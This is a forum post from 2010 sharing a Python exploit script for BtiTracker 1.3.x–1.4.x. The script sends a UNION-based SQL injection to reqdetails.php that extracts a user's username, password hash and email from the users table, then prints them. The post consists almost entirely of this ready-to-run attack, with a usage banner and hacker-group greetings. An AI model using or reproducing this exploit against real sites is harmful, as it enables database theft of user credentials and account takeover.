BtiTracker 1.3.x – 1.4.x Exploit

Discussion in 'Песочница' started by c0de.breaker, 16 Jul 2010.

  1. c0de.breaker

    c0de.breaker New Member

    Joined:
    15 Jul 2010
    Messages:
    6
    Likes Received:
    3
    Reputations:
    5
    BtiTracker 1.3.x – 1.4.x Exploit


    [​IMG]


    Code:
    #!/usr/bin/env python# 
################################################################################
# ______           ____                                      __      [ xpl0it ] #
#/\__  _\        /\   _`\                                 __/\ \__              #
#\/_/\ \/     ___\ \,\L\_\     __    ___   __   __  _ __ /\_\ \ ,_\  __  __     #
#   \ \ \   /' _ `\/_\__ \   /'__`\ /'___\/\ \/\  \/\`'__\/\ \ \ \/ /\ \/\ \    #
#    \_\ \__/\ \/\ \/\ \L\ \/\  __//\ \__/\ \  \_\ \ \ \/ \ \ \ \ \_\ \ \_\ \   #
#    /\_____\ \_\ \_\ `\____\ \____\ \____\\  \____/\ \_\  \ \_\ \__\\/`____ \  #
#    \/_____/\/_/\/_/\/_____/\/____/\/____/  \/___/  \/_/   \/_/\/__/ `/___/> \ #
#                                                    _________________   /\___/ #
#                                                    www.insecurity.ro   \/__/  #
#                                                                               # 
################################################################################  
#                    [  BtiTracker 1.3.X - 1.4.X Exploit ]                      # 
#    Greetz: daemien, Sirgod, Puscas_Marin,  AndrewBoy, Ras, HrN, vilches       #
#    Greetz: excess, E.M.I.N.E.M, flo flow,  paxnWo, begood, and ISR Staff      # 
################################################################################  
#                    Because we care, we're security aware                      # 
################################################################################  
 
import sys, urllib2, re
  
if len(sys.argv) < 2:
    print "==============================================================="
    print "============== BtiTracker 1.3.X - 1.4.X Exploit  ==============="
    print "==============================================================="
    print "=               Discovered and coded by  TinKode               ="     
    print "=                      www.InSecurity.ro                       ="
    print "=                                                              ="
    print "= Local  Command:                                              ="
    print "= ./isr.py [http://webshit]  [ID]                              ="
    print "=                                                              ="
    print "==============================================================="
    exit()
  
if len(sys.argv) < 3:
    id = 1
else:
    id = sys.argv[2]
  
shit  = sys.argv[1]
if shit[-1:] != "/":
    shit += "/"
  
url  = shit  + "reqdetails.php?id=-1337+and+1=0+union+all+select+1,2,3,\
concat(0x2d,0x2d,username,0x3a,password,0x3a,email,0x2d,0x2d)\
,5,6,7,8,9,10+from+users+where+ID=" + str(id) +  "--"
print "\n"
print "============================================="
print "=================  InSecurity ================"
print "============================================="
  
html  = urllib2.urlopen(url).read()
slobod =  re.findall(r"--(.*)\:([0-9a-fA-F]{32})\:(.*)--", html)
if  len(slobod)  > 0:
    print "ID       : "  + str(id)
    print "Username : " +  slobod[0][0]
    print "Password : " +  slobod[0][1]
    print "EMail    : " +  slobod[0][2] 
    print "============================================="
    print "================= InSecurity ================"
    print "============================================="
else:
    print "Ai luat-o la gaoaza..."
     
#InSecurity.ro - Romania
    Mirrors:#Thanks, TinKode @ ISR

    I don't know if I posted in the right section.
     
    #1 c0de.breaker, 16 Jul 2010
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.